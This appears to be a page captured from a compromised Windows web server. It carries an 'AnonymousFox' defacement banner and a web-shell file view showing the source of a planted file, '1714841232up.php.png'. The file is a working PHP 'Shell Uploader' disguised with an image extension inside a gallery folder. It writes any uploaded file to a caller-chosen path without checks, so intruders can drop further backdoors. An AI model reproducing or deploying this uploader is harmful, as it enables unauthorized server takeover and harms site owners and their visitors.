Hacked By AnonymousFox

Current Path : C:/AppServ/www/th/gallery/undefine/
Upload File :
Current File : C:/AppServ/www/th/gallery/undefine/1714841232up.php.png

<?php
$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='$fullpath'>Click Me!</a></h1>";
    }
}echo '<html><head><title>Shell Uploader</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=hidden name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>';
?>

Hacked By AnonymousFox1.0, Coded By AnonymousFox